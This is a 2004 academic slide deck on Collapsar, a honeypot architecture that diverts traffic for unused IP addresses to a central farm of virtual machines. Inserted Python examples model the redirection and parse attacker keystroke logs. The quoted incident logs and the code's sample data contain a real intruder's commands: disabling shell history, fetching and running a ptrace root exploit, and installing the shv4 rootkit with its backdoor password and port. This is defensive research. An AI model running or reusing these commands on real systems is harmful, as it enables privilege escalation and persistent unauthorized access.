
1 Collapsar: A VM-Based Architecture for Network Attack Detention Center Xuxian Jiang, Dongyan Xu Department of Computer Sciences Center for Education and Research in Information Assurance and Security (CERIAS) Purdue University USENIX Security 2004

2 Outline  Motivation  Collapsar architecture and features  Collapsar design, implementation, and performance  Collapsar deployment and real-world incidents  Conclusion and on-going work

3 Motivation  Need for network attack containment and monitoring  Worm outbreaks (MSBlaster, Sasser…)  Debian project servers hacked (Nov. 2003)  PlanetLab nodes compromised (Dec. 2003)  And more

4 Motivation  Promise of honeypots  Providing insights into intruders' motivations, tactics, and tools  Highly concentrated datasets with low noise: every connection to a honeypot is suspect by construction  Low false-positive and false-negative rates  Discovering unknown vulnerabilities and exploits  Example: CERT advisory CA-2002-01 (Solaris CDE subprocess control daemon, dtspcd)

5 Current Honeypot Operation  Individual honeypots  Limited local view of attacks  Federation of distributed honeypots  Deploying honeypots in different networks  Exchanging logs and alerts  Problems  Difficulties in distributed management  Lack of honeypot expertise  Inconsistency in security and management policies  Example: log format, sharing policy, exchange frequency

6 Our Solution: Collapsar  Based on the HoneyFarm idea of Lance Spitzner  Achieving two (seemingly) conflicting goals  Distributed honeypot presence  Centralized honeypot operation  Key ideas  Leveraging unused IP addresses in each network  Diverting corresponding traffic to a “detention” center (transparently)  Creating VM-based honeypots in the center

7 Collapsar Architecture (figure)  Participating production networks, each with a Redirector  Attacker traffic to unused addresses diverted to the Collapsar Center  Center components: Front-End, VM-based Honeypots, Correlation Engine, Management Station

8 Comparison with Current Approaches  Overlay-based approach (e.g., NetBait, Domino overlay)  Honeypots deployed in different sites  Logs aggregated from distributed honeypots  Data mining performed on aggregated log information  Key difference: where the attacks take place (on-site vs. off-site)

9 Comparison with Current Approaches  Sinkhole networking approach (e.g., iSink)  "Dark" address space used to monitor Internet-wide anomalies and background noise (e.g., MSBlaster worm traffic)  Limited interaction for better scalability  Key difference: contiguous large address blocks (vs. scattered unused addresses)

10 Comparison with Current Approaches  Low-interaction approach (e.g., honeyd, iSink)  Highly scalable deployment  Low security risks  Key difference: emulated services (vs. real systems and services)  Less effective at revealing unknown vulnerabilities  Less effective at capturing 0-day worms

11 Collapsar Design  Functional components  Redirector  Collapsar Front-End  Virtual honeypots  Assurance modules  Logging module  Tarpitting module  Correlation module

12 Functional Components  Redirector  Running in each participating network  Capturing traffic toward unused IP addresses  Redirecting it to the Collapsar Front-End  Two implementation options  Proxy-ARP approach: the redirector claims the unused addresses on the local segment  Longer latency  Minimal change to network infrastructure  GRE (Generic Routing Encapsulation) approach: the router tunnels traffic for the unused addresses to the Front-End  Lower latency  Requiring router re-configuration  Misses attack traffic that originates inside the domain (it never passes through the router)

13 Functional Components  Collapsar Front-End  Dispatching incoming traffic to different honeypots  Transparent bridging  Mitigating security risks  Transparent firewalling  Packet re-writing  Assurance module plug-in  Logging modules  Tarpitting modules
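The redirector and Front-End slides describe a data path but show no code. The following is an added illustration of that path, written for this page and not taken from the Collapsar implementation: the GRE option of the redirector wraps packets addressed to an unused IP in IPv4+GRE toward the Front-End, and the Front-End strips the wrapper and rewrites the destination so the VM honeypot that owns the captured address accepts the packet. All addresses (192.0.2.0/24 as the participating network, 198.51.100.10 as the Front-End, 10.10.0.0/24 for the honeypots) and the one-to-one address mapping are assumptions for the example; the real Front-End also does transparent bridging and firewalling, which are not modeled here.

```python
import ipaddress
import struct

# Added illustration of the Collapsar data path (not the authors' code).
# Constructed addresses: 192.0.2.0/24 is a participating network whose unused
# addresses .50 and .51 are claimed for honeypots, the Redirector sits at
# 192.0.2.1, the Front-End at 198.51.100.10, and the VM honeypots live on a
# private 10.10.0.0/24 behind the Front-End.
UNUSED = {"192.0.2.50", "192.0.2.51"}
REDIRECTOR_IP = "192.0.2.1"
FRONTEND_IP = "198.51.100.10"
HONEYPOTS = {"192.0.2.50": "10.10.0.50", "192.0.2.51": "10.10.0.51"}
IPPROTO_GRE = 47
ETHERTYPE_IPV4 = 0x0800


def ip_checksum(hdr: bytes) -> int:
    """RFC 791 one's-complement checksum; returns 0 over a valid header."""
    if len(hdr) % 2:
        hdr += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(hdr) // 2), hdr))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
    """Minimal 20-byte IPv4 header (no options) in front of payload."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.ip_address(src).packed, ipaddress.ip_address(dst).packed)
    return hdr[:10] + struct.pack("!H", ip_checksum(hdr)) + hdr[12:] + payload


def parse_ipv4(pkt: bytes):
    """Return (header length, protocol, src, dst) of an IPv4 packet."""
    ihl = (pkt[0] & 0x0F) * 4
    return (ihl, pkt[9], str(ipaddress.ip_address(pkt[12:16])),
            str(ipaddress.ip_address(pkt[16:20])))


def redirect(pkt: bytes):
    """Redirector (GRE option): a packet for an unused address of this network
    is wrapped in IPv4+GRE toward the Front-End. Other traffic (None) is left
    for the production network to deliver as usual."""
    _, _, _, dst = parse_ipv4(pkt)
    if dst not in UNUSED:
        return None
    gre = struct.pack("!HH", 0, ETHERTYPE_IPV4)  # no key/seq/csum; protocol = IPv4
    return build_ipv4(REDIRECTOR_IP, FRONTEND_IP, IPPROTO_GRE, gre + pkt)


def dispatch(outer: bytes):
    """Front-End: strip the GRE wrapper and hand the original packet to the VM
    honeypot that owns the captured address, rewriting the destination so the
    honeypot's own IP stack accepts it."""
    ihl, proto, _, dst = parse_ipv4(outer)
    if proto != IPPROTO_GRE or dst != FRONTEND_IP:
        return None
    flags, ethertype = struct.unpack("!HH", outer[ihl:ihl + 4])
    if flags != 0 or ethertype != ETHERTYPE_IPV4:
        return None  # optional GRE fields are not handled in this illustration
    inner = outer[ihl + 4:]
    iihl, _, _, idst = parse_ipv4(inner)
    vm = HONEYPOTS.get(idst)
    if vm is None:
        return None  # captured address with no honeypot behind it: drop
    hdr = bytearray(inner[:iihl])
    hdr[16:20] = ipaddress.ip_address(vm).packed
    hdr[10:12] = b"\x00\x00"
    hdr[10:12] = struct.pack("!H", ip_checksum(bytes(hdr)))
    # A production rewriter also fixes the TCP/UDP checksum (its pseudo-header
    # covers the destination) and restores the captured address on replies.
    return bytes(hdr) + inner[iihl:]


if __name__ == "__main__":
    probe = build_ipv4("203.0.113.9", "192.0.2.50", 6, b"\x00" * 20)  # constructed probe
    outer = redirect(probe)
    print("encapsulated", len(outer), "bytes; delivered to", parse_ipv4(dispatch(outer))[3])
```

The unused-address check in `redirect` is the whole basis of the low-noise property on the Motivation slide: nothing legitimately sends to those addresses, so everything that passes the check is worth a honeypot's time. The proxy-ARP option differs only in how packets reach the redirector (it answers ARP for the unused addresses on the local segment), not in what happens afterwards.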

14 Functional Components  Virtual honeypots  VM-based high-interaction honeypots  VMware  Enhanced User-Mode Linux (UML)  Commodity OS and popular services  Linux, Windows, Solaris, FreeBSD  Apache, samba, sendmail, named  Capability of forensic analysis  System image snapshot / restoration

15 Assurance Modules  Logging module  Traffic logging (e.g., tcpdump, snort)  Where: Front-End and honeypots  Keystroke logging (e.g., sebek)  Where: honeypots  Tarpitting module (e.g., snort-inline)  Mitigating security risks  Where: Front-End  Correlation module  Mining and correlation of the collected logs

16 Performance Measurement  Measurement set-up (figure): two hosts, a Dell PowerEdge Server (2.6GHz Xeon/2GB Memory) and a Dell Desktop PC (1.8GHz Pentium 4/768MB Memory); attacker A, Redirector, Front-End, and a VMware- or UML-based honeypot H in the Collapsar Center  Metrics  TCP throughput (Nock, http://www.cs.wisc.edu/~zandy/p/nock)  ICMP latency

17 Measurement Results: TCP throughput (figure)

18 Measurement Results: ICMP latency (figure)

19 Collapsar Deployment  Deployed in a local environment for a two-month period in 2003  Traffic redirected from five networks  Three wired LANs  One wireless LAN  One DSL network  ~40 honeypots analyzed so far  Internet worms (MSBlaster, Enbiei, Nachi)  Interactive intrusions (Apache, Samba)  OS: Windows, Linux, Solaris, FreeBSD

20 Incident: Apache Honeypot/VMware  Vulnerabilities  Vul 1: Apache chunked-encoding handling (CERT® CA-2002-17), used for initial access as the web server account  Vul 2: Linux kernel ptrace/kmod local privilege escalation (CERT® VU-6288429), used to get root  Time-line  Deployed: 23:44:03, 11/24/03  Compromised: 09:33:55, 11/25/03 (under ten hours later)  Attack monitoring  Detailed log  http://www.cs.purdue.edu/homes/jiangx/collapsar

21 Incident: Apache Honeypot/VMware (keystroke log; format is [timestamp source pid process uid]command)
1. Gaining a regular account: apache (uid 48)
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; echo; echo ' >>>> GAME OVER! Hackerz Win ;) <<<<'; echo; echo; echo "****** I AM IN '`hostname -f`' ******"; echo; if [ -r /etc/redhat-release ]; then echo `cat /etc/redhat-release`; elif [ -r /etc/suse-release ]; then echo SuSe `cat /etc/suse-release`; elif [ -r /etc/slackware-version ]; then echo Slackware `cat /etc/slackware-version`; fi; uname -a; id; echo
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
2. Escalating to root privilege
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p

22 Incident: Apache Honeypot/VMware (continued)
3. Installing a set of backdoors (shv4 rootkit; subsequent commands arrive through its SSH backdoor, logged under the process name xntps)
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
4. Adding the ftpd user and installing an IRC-based file server (iroffer)
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-25 09:37:00 aaa.bb.c.126 8009 xntps 0]cd ftpd; mkdir .logs;cd .logs
[2003-11-25 09:37:04 aaa.bb.c.126 8009 xntps 0]wget http://xxxxxxx.xxx/archive/v1.2/iroffer1.2b22.tgz;tar -zvxf iroffer1.2b22.tgz;cd iroffer1.2b22;./Configure;make
[2003-11-25 09:37:50 aaa.bb.c.126 8009 xntps 0]mv iroffer syst
[2003-11-25 09:37:52 aaa.bb.c.126 8009 xntps 0]pico rpm
[2003-11-25 09:38:01 aaa.bb.c.126 8009 xntps 0]./syst -b rpm >/dev/null &

23 Incident: Windows XP Honeypot/VMware  Vulnerability  RPC DCOM buffer overrun (Microsoft Security Bulletin MS03-026)  Time-line  Deployed: 22:10:00, 11/26/03  MSBlaster: 00:36:47, 11/27/03  Enbiei: 01:48:57, 11/27/03  Nachi: 07:03:55, 11/27/03  Three different worms for the same vulnerability within nine hours of deployment

24 Log Correlation: Stepping Stone  iii.jjj.kkk.11 compromised a honeypot and installed a rootkit, which contained an ssh backdoor  xx.yyy.zzz.3 later connected to the ssh backdoor using the same password
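The Apache incident slides show a keystroke log and the stepping-stone slide describes a correlation across sessions, but neither shows how an analyst would extract those findings from the records. The example below is added here and is not the Collapsar correlation module. It parses lines in the keystroke-log format printed on slides 21 and 22 (the aaa.bb.c.126 lines are the page's own, with the first command trimmed and the URLs redacted as on the page), reconstructs the escalation timeline, recovers the backdoor password and port from the rootkit's `./setup rooter 1985` command, and then flags a second source that later types commands through the same backdoor process as root. The xx.yyy.zzz.3 lines are constructed to model the stepping-stone slide; the correlation key here is the backdoor process name rather than the reused password, since a keystroke log does not carry the SSH password itself.

```python
import re
from datetime import datetime

# Keystroke log in the format shown on the Apache incident slides:
#   [YYYY-MM-DD HH:MM:SS source_ip pid process uid]command
# aaa.bb.c.126 lines are from the page (first command trimmed, URLs redacted
# there). xx.yyy.zzz.3 lines are constructed for this example to model the
# second hop of the stepping stone described on the correlation slide.
LOG = """\
[2003-11-25 09:33:55 aaa.bb.c.126 7817 sh 48]export HISTFILE=/dev/null; uname -a; id
[2003-11-25 09:34:01 aaa.bb.c.126 7817 sh 48]cd /tmp
[2003-11-25 09:34:07 aaa.bb.c.126 7817 sh 48]wget http://xxxxxxxxxxxxxxxxxxxxx.xx/0304-exploits/ptrace-kmod.c;gcc ptrace-kmod.c -o p;./p
[2003-11-25 09:35:46 aaa.bb.c.126 7838 sh 0]wget http://xxxxxxx.xx.xx/vip/xxxxxx/shv4.tar.gz;tar -xzf shv4.tar.gz;cd shv4;./setup rooter 1985
[2003-11-25 09:36:16 aaa.bb.c.126 8009 xntps 0]SSH-1.5-PuTTY-Release-0.53b
[2003-11-25 09:36:57 aaa.bb.c.126 8009 xntps 0]cd /home;adduser ftpd;su ftpd
[2003-11-26 02:11:40 xx.yyy.zzz.3 9120 xntps 0]SSH-1.5-OpenSSH_3.4p1
[2003-11-26 02:12:03 xx.yyy.zzz.3 9120 xntps 0]cd /home/ftpd/.logs;./syst -b rpm
"""

LINE = re.compile(r"^\[(\S+ \S+) (\S+) (\d+) (\S+) (\d+)\](.*)$")


def parse(log: str):
    """One dict per well-formed record; malformed lines are skipped."""
    recs = []
    for line in log.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts, src, pid, proc, uid, cmd = m.groups()
        recs.append({"ts": datetime.strptime(ts, "%Y-%m-%d %H:%M:%S"), "src": src,
                     "pid": int(pid), "proc": proc, "uid": int(uid), "cmd": cmd})
    return recs


def timeline(recs):
    """Per-source findings: anti-forensics, uid changes to root, tool drops."""
    findings = []
    last_uid = {}
    for r in recs:
        prev = last_uid.get(r["src"])
        if "HISTFILE=/dev/null" in r["cmd"]:
            findings.append((r["ts"], r["src"], "anti-forensics: shell history disabled"))
        if prev is not None and prev != 0 and r["uid"] == 0:
            findings.append((r["ts"], r["src"], f"privilege escalation uid {prev} -> 0"))
        for url in re.findall(r"wget (\S+)", r["cmd"]):
            findings.append((r["ts"], r["src"], f"tool download {url}"))
        last_uid[r["src"]] = r["uid"]
    return findings


def backdoors(recs):
    """Rootkit install: './setup <passwd> <port>' typed as root after unpacking shv4."""
    out = []
    for r in recs:
        m = re.search(r"shv4.*?\./setup (\S+) (\d+)", r["cmd"])
        if m and r["uid"] == 0:
            out.append({"installer": r["src"], "ts": r["ts"],
                        "passwd": m.group(1), "port": int(m.group(2))})
    return out


def stepping_stones(recs):
    """Sources other than the installer that later type root commands through
    the same process the installer's backdoor session ran under (xntps here):
    the second hop of a stepping stone. Returns (installer, user, proc, port)."""
    hits = set()
    for bd in backdoors(recs):
        later = [r for r in recs if r["ts"] > bd["ts"] and r["uid"] == 0]
        backdoor_procs = {r["proc"] for r in later if r["src"] == bd["installer"]}
        for r in later:
            if r["src"] != bd["installer"] and r["proc"] in backdoor_procs:
                hits.add((bd["installer"], r["src"], r["proc"], bd["port"]))
    return sorted(hits)


if __name__ == "__main__":
    records = parse(LOG)
    for ts, src, what in timeline(records):
        print(ts, src, what)
    print("backdoors:", backdoors(records))
    print("stepping stones:", stepping_stones(records))
```

The escalation check keys on the uid column rather than on the exploit's file name, so it also catches a kernel exploit the analyst has never seen: the log records uid 48 (apache) and then uid 0 from the same source a minute later, whatever binary produced the transition. The stepping-stone match deliberately requires root and the backdoor's process name, so ordinary later traffic to the honeypot from a scanner does not count.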

25 Log Correlation: Network Scanning

26 Conclusions  A new architecture for attack containment and monitoring  Distributed presence and centralized operation of honeypots  Good potential in attack correlation and log mining  Unique features  Aggregation of scattered unused IP addresses  Off-site (relative to participating networks) attack occurrences and monitoring  Real services for unknown-vulnerability revelation

27 On-going Work  Integration into trusted server architectures (SODA and Poly2)  On-demand honeypot customization  Collapsar center federation  Scalability  Testbed for worm containment (coming soon)

28 Thank you. For more information: Email: {dxu, jiangx}@cs.purdue.edu URL: www.cs.purdue.edu/~dxu Google: "Purdue Collapsar friends"

